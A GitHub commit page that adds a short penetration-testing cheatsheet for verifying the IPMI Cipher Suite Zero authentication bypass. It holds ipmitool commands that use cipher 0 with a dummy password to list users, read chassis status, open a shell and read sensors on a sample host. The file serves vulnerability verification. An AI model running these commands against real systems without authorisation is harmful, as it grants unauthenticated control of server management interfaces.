Skip to content

Commit

Permalink
Vulnerability Verify Cheatsheet
Browse files Browse the repository at this point in the history
Added Vulnerability Verify Cheatsheet
  • Loading branch information
1nPr0c committed Oct 1, 2014
1 parent c3afc63 commit fb6f719
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions Cheatsheet_VulnVerify.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
Verify various vulnerabilities
------------------------------

[+] IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931

Tools required:
ipmitool
freeipmi-tools

ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list

# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor

0 comments on commit fb6f719

Please sign in to comment.